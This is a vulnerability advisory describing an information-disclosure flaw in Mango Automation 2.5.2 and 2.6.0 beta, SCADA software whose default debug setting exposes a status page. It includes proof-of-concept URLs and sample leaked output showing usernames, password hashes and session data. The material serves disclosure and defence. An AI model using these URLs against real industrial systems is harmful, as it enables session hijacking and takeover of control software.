Mango Automation 2.6.0 Unprotected Debug Log View

`  
Mango Automation 2.6.0 Unprotected Debug Log View Vulnerability  
  
  
Vendor: Infinite Automation Systems Inc.  
Product web page: http://www.infiniteautomation.com/  
Affected version: 2.5.2 and 2.6.0 beta (build 327)  
  
Summary: Mango Automation is a flexible SCADA, HMI  
And Automation software application that allows you  
to view, log, graph, animate, alarm, and report on  
data from sensors, equipment, PLCs, databases, webpages,  
etc. It is easy, affordable, and open source.  
  
Desc: Mango Automation suffers from information disclosure  
vulnerability because it contains default configuration for  
debugging enabled in the '/WEB-INF./web.xml' file (debug=true).  
An attacker can entice a logged-in user to visit a specially  
crafted URL which will produce a system exception with stack  
trace on the Jetty server. When this error occurs, the debug  
option generates a status page with all the information from  
the visitor, meaning that the attacker is able to see usernames,  
password hashes, e-mails and of course, Cookie sessions). Using  
the generated error, the attacker can easily perform session  
hijacking and take over the system using previously discovered  
vulnerabilities by just visiting the status page non-authenticated.  
  
Tested on: Microsoft Windows 7 Professional SP1 (EN) 32/64bit  
Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit  
Jetty(9.2.2.v20140723)  
Java(TM) SE Runtime Environment (build 1.8.0_51-b16)  
Java HotSpot(TM) Client VM (build 25.51-b03, mixed mode)  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2015-5260  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5260.php  
  
  
20.08.2015  
  
--  
  
  
One scenario is where the attacker visits the following URL and takes over the admin session (given that the administrator didn't manually disabled the debugging and has produced some exception in current session):  
  
- http://localhost:8080/status/  
  
Other scenario is where the attacker sends a link to the victim so the victim after clicking on the link, generates exception and writes all his session attributes in the status page:  
  
- http://localhost/status/mango.json?time=$  
- http://localhost/status/  
  
  
Sample status output:  
\"$\"\r\n\r\n\r\nSESSION ATTRIBUTES\r\n sessionUser=User [id=6, username=n00b, password=NWoZK3kTsExUV00Ywo1G5jlUKKs=, [email protected], phone=123321, admin=true, disabled=false, dataSourcePermissions=[], dataPointPermissions=[], homeUrl=, lastLogin=1440142956496, receiveAlarmEmails=0, receiveOwnAuditEvents=false, timezone=]\r\n LONG_POLL_DATA_TIMEOUT=1440143583487\r\n LONG_POLL_DATA=[com.serotonin.m2m2.web.dwr.longPoll.LongPollData@839308, com.serotonin.m2m2.web.dwr.longPoll.LongPollData@1b4dafa]\r\n\r\n\r\nCONTEXT ATTRIBUTES\r\n DwrContainer=org.directwebremoting.impl.DefaultContainer@138158\r\n constants.EventType.EventTypeNames.AUDIT=AUDIT\r\n constants.SystemEventType.TYPE_USER_LOGIN=USER_LOGIN\r\n constants.Permissions.DataPointAccessTypes.READ=1\r\n org.directwebremoting.ContainerList=[org.directwebremoting.impl.DefaultContainer@138158]\r\n constants.DataTypes.BINARY=1\r\n constants.UserComment.TYPE_EVENT=1\r\n constants.SystemEventType.TYPE_SYSTEM_STARTUP=SYSTEM_STARTUP\r\n javax.servlet.ServletConfig=org.eclipse.jetty.servlet.ServletHolder$Config@bc620e\r\n   
  
  
Also you can list all of the Classes known to DWR:  
  
- http://localhost:8080/dwr/index.html  
`